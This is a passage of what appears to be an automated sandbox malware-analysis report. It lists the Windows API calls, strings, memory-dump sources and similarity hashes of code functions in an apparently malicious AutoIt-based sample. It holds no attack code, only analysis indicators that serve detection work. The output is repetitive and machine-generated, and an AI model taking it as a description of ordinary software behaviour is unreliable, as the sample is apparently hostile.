                                                                                                                  • Instruction Fuzzy Hash: CF118C71500208AFEB205F64EC44EEB3B6AEB053B8F526354F965B71E1C771EC509BA0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E252D5
                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E252F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                  • Opcode ID: 9836cf8cbd17840e209c5149e71319444ee09858ed82c254b23f0bab598936cf
                                                                                                                  • Instruction ID: dc0a744f3172e4011bc0bb91dff16513251f6e268a5aa17fdc4b5cc62066d4f0
                                                                                                                  • Opcode Fuzzy Hash: 9836cf8cbd17840e209c5149e71319444ee09858ed82c254b23f0bab598936cf
                                                                                                                  • Instruction Fuzzy Hash: 2D11D073901734EBDB20DB98EE04B9D77B8AB06798F052025E902B72A4D3B0AD04C7A0
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E34DF5
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E34E1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 067896ae582458381142537e2047f761ea57d53e1b093ac5154c912d5b9056f3
• Instruction ID: e835df009058f67a6869b76ec8106d9f60a1c7258d3e670150f60efbacd558bf
• Opcode Fuzzy Hash: 067896ae582458381142537e2047f761ea57d53e1b093ac5154c912d5b9056f3
• Instruction Fuzzy Hash: 261191B1505221BADB258B52CC88EEBFFA8FF06759F50911AF50566180D3706944C6E0
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E137A7
• ___raise_securityfailure.LIBCMT ref: 00E1388E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: (
• API String ID: 3761405300-2982846942
• Opcode ID: e652d43d73cac06ac6ec0311a594584f4b35f82b7313cd7a4b68f17fff359076
• Instruction ID: e95afd7c60f46eaf983ec895d968f7cafa76f1bf1c16cd0ccf7be33d74d242db
• Opcode Fuzzy Hash: e652d43d73cac06ac6ec0311a594584f4b35f82b7313cd7a4b68f17fff359076
• Instruction Fuzzy Hash: 8121E2B5541304DFDB00DF66E9956413BF4BB4E314F14982AE508BB3A1E3B17A88EB86
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: b4ef295ac682058ddc2897119e60478bdb3767b9bd69283364c7be7757354eff
• Instruction ID: ed36b279853b85d53ccbd04bcfa95cca08669a25ea4a6eb5552317b01e6dfa7e
• Opcode Fuzzy Hash: b4ef295ac682058ddc2897119e60478bdb3767b9bd69283364c7be7757354eff
• Instruction Fuzzy Hash: 0D012634200304ABCB249F68D88EFEDB7A4EF44314F10942AF515B72D1C772E845C752
APIs
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E1B7EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 053b93bfa86b7ed8d0dd624873906d62f6dae42f2c3c0da1b14c6579e0e4b867
• Instruction ID: 38b8350bd74417a89ba200f2bab690f17e58662cd1f8ee6d483a80f1238edccc
• Opcode Fuzzy Hash: 053b93bfa86b7ed8d0dd624873906d62f6dae42f2c3c0da1b14c6579e0e4b867
• Instruction Fuzzy Hash: F601D472A50114ABCB04FBA8CC529FE33AAFF45354B04161DF462B72D2EBB0594987B0
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00E1B6EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: b1e4bb256f0da5ee2f10f3ae287bd1521054ae9bb05943aa5cda04bb904ad41f
• Instruction ID: b61e225d81da6a0b2c716d475794b29fcd939db4ff69ea873969b2955112ecff
• Opcode Fuzzy Hash: b1e4bb256f0da5ee2f10f3ae287bd1521054ae9bb05943aa5cda04bb904ad41f
• Instruction Fuzzy Hash: 5801A271A41104ABCB05FBA5CD52AFF73A9EF15344F10201DF502B3181EB945E1987B5
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00E1B76C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: dde6d3e3e8a705c4e0cd3853d9fa369c2b4851fe48cd3a5901c16b2fb018837d
• Instruction ID: 9ba2d1e9187c558b9a1db754437a07ef417d4051894b974d897cf1b7b4941d92
• Opcode Fuzzy Hash: dde6d3e3e8a705c4e0cd3853d9fa369c2b4851fe48cd3a5901c16b2fb018837d
• Instruction Fuzzy Hash: 3001D172A40104BBCB01FBA4CD02EFF73AD9B05344F50211AF502B31D2EBA45E5A87B5
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __calloc_crt
• String ID: "
• API String ID: 3494438863-357034475
• Opcode ID: 56204bc43dc0b428ebb6fa6ecf4cc0a2f90f1038a397b4ff548c18405ebf98b9
• Instruction ID: a785bce1599f5db914b68f6c1c08579d1ba8e4cdbc8b839c523a3a529fc64014
• Opcode Fuzzy Hash: 56204bc43dc0b428ebb6fa6ecf4cc0a2f90f1038a397b4ff548c18405ebf98b9
• Instruction Fuzzy Hash: 04F0C8F12096025EE7149B1EBD41BA66BD4E749724B14112FF304FA1E4E730E8C146A4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: aeca91e1196d134b309d4889cffe593f6ee916f31f5cb056fd51fd6c0940e125
• Instruction ID: d2eca0e5d02ceea210c5187e4d4cd46fb5649dead7761ce5f8522fea34baba81
• Opcode Fuzzy Hash: aeca91e1196d134b309d4889cffe593f6ee916f31f5cb056fd51fd6c0940e125
• Instruction Fuzzy Hash: 08E0D877A083292BDB10EAA6EC09ECBFBACEB55764F010056F915F7081D6B0E64587D0
                                                                                                                  APIs
                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E1A63F
                                                                                                                    • Part of subcall function 00E013F1: _doexit.LIBCMT ref: 00E013FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message_doexit
                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                  • Opcode ID: befbfecc449821b64c7cc0e2834a65c94827f4faa4995b57f2286a65377259c0
                                                                                                                  • Instruction ID: e96417389cf18fdd24095f6a1980bc23c9edff73a3a2d7fafa18e9d578f94b07
                                                                                                                  • Opcode Fuzzy Hash: befbfecc449821b64c7cc0e2834a65c94827f4faa4995b57f2286a65377259c0
                                                                                                                  • Instruction Fuzzy Hash: 78D0123138936836D21436A97C17FD975488F15B95F095025FB1CB55C249D6958041F9
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00E5ACC0
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E5AEBD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                  • String ID: WIN_XPe
                                                                                                                  • API String ID: 510247158-3257408948
                                                                                                                  • Opcode ID: 9406e58bae86c256a1580cf037f419e40438a45b5cc658450184a2e4552bc2d5
                                                                                                                  • Instruction ID: 9dea97ecc38c15ec6c09f54b312306ec06961557f5a71e85605f675d430f6cc5
                                                                                                                  • Opcode Fuzzy Hash: 9406e58bae86c256a1580cf037f419e40438a45b5cc658450184a2e4552bc2d5
                                                                                                                  • Instruction Fuzzy Hash: A9E06D70C04109DFCB11DBA9DD449ECF7B8AB48302F189595E622B2260CBB05A88DF32
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E486E2
                                                                                                                  • PostMessageW.USER32(00000000), ref: 00E486E9
                                                                                                                    • Part of subcall function 00E27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27AD0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: 722849c5287e24ba5f746beed5c9e69b44331865f8a82950e9f321524e1f7833
                                                                                                                  • Instruction ID: e19bdb81ade0cd55257c844208050cb03ac12d286ab3e0a067a06581a837426a
                                                                                                                  • Opcode Fuzzy Hash: 722849c5287e24ba5f746beed5c9e69b44331865f8a82950e9f321524e1f7833
                                                                                                                  • Instruction Fuzzy Hash: 3FD0A931B88324BBE2246330AC0BFCB2A089B08B20F400809F246BA0D0C8E0A9008614
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E486A2
                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E486B5
                                                                                                                    • Part of subcall function 00E27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27AD0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: 31da267a78c0e46f834a9074c8b7d7ffcdf05b6062269f4493cc82b8ecff4f68
                                                                                                                  • Instruction ID: 977b4c613c99cc7183f370dce361fd48fb44d9c89acc8483d966ed3933604bb7
                                                                                                                  • Opcode Fuzzy Hash: 31da267a78c0e46f834a9074c8b7d7ffcdf05b6062269f4493cc82b8ecff4f68
                                                                                                                  • Instruction Fuzzy Hash: 3FD0A931B88324BBE2246330AC0BFCB2A089B04B20F000809F24ABA0D0C8E0A9008610